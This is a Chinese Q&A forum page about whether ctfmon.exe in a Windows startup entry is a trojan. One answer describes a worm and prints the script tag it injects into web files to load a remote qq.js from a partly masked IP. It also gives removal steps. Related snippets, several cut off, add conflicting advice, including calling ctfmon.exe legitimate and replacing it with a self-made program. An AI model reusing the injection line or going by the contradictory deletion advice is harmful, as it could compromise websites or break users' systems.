根据注册表启动项推断,发现以下可疑文件:c\windows\system32\ctfmon.exe怀疑是木马程序

根据注册表启动项推断,发现以下可疑文件:c\windows\system32\ctfmon.exe怀疑是木马程序,这是怎么回事,该怎么处理一下

这是一个蠕虫病毒。(蠕虫病毒比以前少了很多,但对局域网的影响会很大)
该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接
一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行.
1.病毒运行后,产生以下病毒文件
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.添加病毒启动项
启动项名:svchost对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.
4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.
5.遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,开始感染,插入一段JS代码:
script language=javascript src=http://218.**.**.248/qq.js
这段脚本病毒,可能会被用作下载更多的木马程序,利用蠕虫攻击传播,利用下载器种植木马,是目前黑客偷东西惯用的手法。
解决方案:
怕麻烦直接去下载专杀工具: http://bbs.antidu.cn/forum-35-1.html
1.删除病毒生成的三个文件,可使用清理专家的文件粉碎器完成操作。
%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%缺省是c:\windows目录)
%WINDIR%\ SYSTEM32\taimpo.txt
%Documents and Settings%\Administrator\桌面\ctfmon.exe(伪装成输入法的程序名)
2.使用金山清理专家的修复功能,将病毒添加的注册表启动项删除。
防范措施:
1.最最重要的,是给系统打补丁,登录系统一定要使用口令,就算是电脑只有自己一个人用,也需要安全的登录口令,口令不能太简单,以免被远程攻击工具猜解。(因为只要电脑接入互联网,就能给木马以机会.)
其它方案基本是相通的,不在缀述!
温馨提示:内容为网友见解,仅供参考
第1个回答  2009-04-26
这个不是病毒,而是WINDOWS输入法管理

根据注册表启动项推断,发现以下可疑文件:c\\windows\\system32\\ctfmon.ex...
1.病毒运行后,产生以下病毒文件 WINDIR%\\ SYSTEM32\\tmipo.bat WINDIR%\\ SYSTEM32\\taimpo.txt 2.添加病毒启动项 启动项名:svchost对应路径:%Documents and Settings%\\Administrator\\桌面\\ctfmon.exe 3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.4.病毒会检测连接的...

注册表清理器清理注册表时,怀疑c:\\windows\\system32\\ctfmom.exe为木马...
第一步:右击任务栏空白处,点“任务管理器”。第二步:找到ctfmon.exe,并终止它。第三步:在系统目录下的system32目录下找到ctfmon.exe,删除掉。第四步:写一个最简单的api程序(代码见附录),编译后放到ctfmon.exe所在目录,并更名为ctfmon.exe。第五步:点击“开始”菜单,点击“运行”,输入in...

可疑文件:C:\\\\WINNT\\\\system32\\\\lsasrv.exe
肯定是病毒。找到它删除就醒了。如果删除不了,就用专门的强制删除工具删(比如兵刃1.20).为了确保安全,删完后要用杀毒软件彻底的查一下毒。防止有隐藏的病毒。

C:\\WINDOWS\\system32\\ctfmon.exe-应用程序,下面写着“被屏弊木马...
可以尝试手动删。如果无法删除就到安全模式下删

请教各位高手:c:\\windows\\system32\\iewoptimem.exe是木马吗? - ..
。。。毫无疑问坚决删除。。。这可能是一个恶意软件程序。。第二个程序 如果杀毒软件有反映可能会是捆绑的屏保程序。。。删除它们只会对系统好 。。。不要担心因此系统崩溃或你某些有用的软件失效!~

我用瑞星查杀的一个可疑文件c:windows\/system32\/wupdmgr.exe
wupdmgr.exe是WORM_SPYBOT.B病毒的一部分。该病毒通过P2P文件共享软件进行传播,它允许攻击者访问你的计算机,窃取密码和个人数据。这个进程的安全等级是建议立即进行删除。

跳出:应用程序或DLL C:\\WINDOWS\\system32\\iemnaw.dll为无效的windows映像...
通过闪电扫描计算机中的可疑文件启动项、服务加载项、注册表加载项,快速清除电脑中的QQ病毒、木马、流氓软件。遇到无法清除的顽固文件,还可以用“文件粉碎”功能来彻底删除。而且查杀病毒后,会自动修复注册表、清除病毒注册表残留项。)2、http:\/\/www.bibidu.com\/fileview-309153.html (AVG Anti-...

启动时有两个C:\\WINDOWS\\system32\\ctfmon.exe进程。是病毒么?
(如果提示无法操作,重启按F8进安全模式删除,重启)。这时再进普通用户模式,可能会提示“c:\\PROGRA~\\COMMON~\\AMIQ\\ ctfmon.exe”找不到,系统无法加载进程(病毒更改了注册表),直接在c:\\PROGRAM FILES\\COM- MON FILES下新建一个AMIQ的文件夹,把c:\\windows\\system32中的ctfmon.exe放入即可。

为什么我电脑开机显示C:\\WINDOWS\\SYSTEM32\\CMD.EXE?
如果修改注册表那就太麻烦了,在windows的system文件夹下有一个regsvr3exe的程序,它就是windows自带的activex注册和反注册工具。一,开始菜单-运行-输入msconfig回车,在里边的启动栏里把C:\\\\WINDOWS\\system32\\start.dll前面的勾去掉就行了:开始——运行——msconfig——启动——把加载项C:\\\\WINDOWS\\...

C:\\WINDOWS\\system32\\mycomppu.dll 是什么文件,金山卫士提示木马?_百度...
mycomppu.dll是未知的可疑文件,在正常的系统中是没有这个文件的!删除C:\\WINDOWS\\system32\\mycomppu.dll,若遇到文件无法删除请参考:1、用UNLOCKER解锁后删除;2、用PowerTool删除;3、用ICESWORD删除;依次点击“开始”“运行”输入regedit 确定后进入注册表 依次点击工具栏中的“编辑”“查找”在“...

相似回答
大家正在搜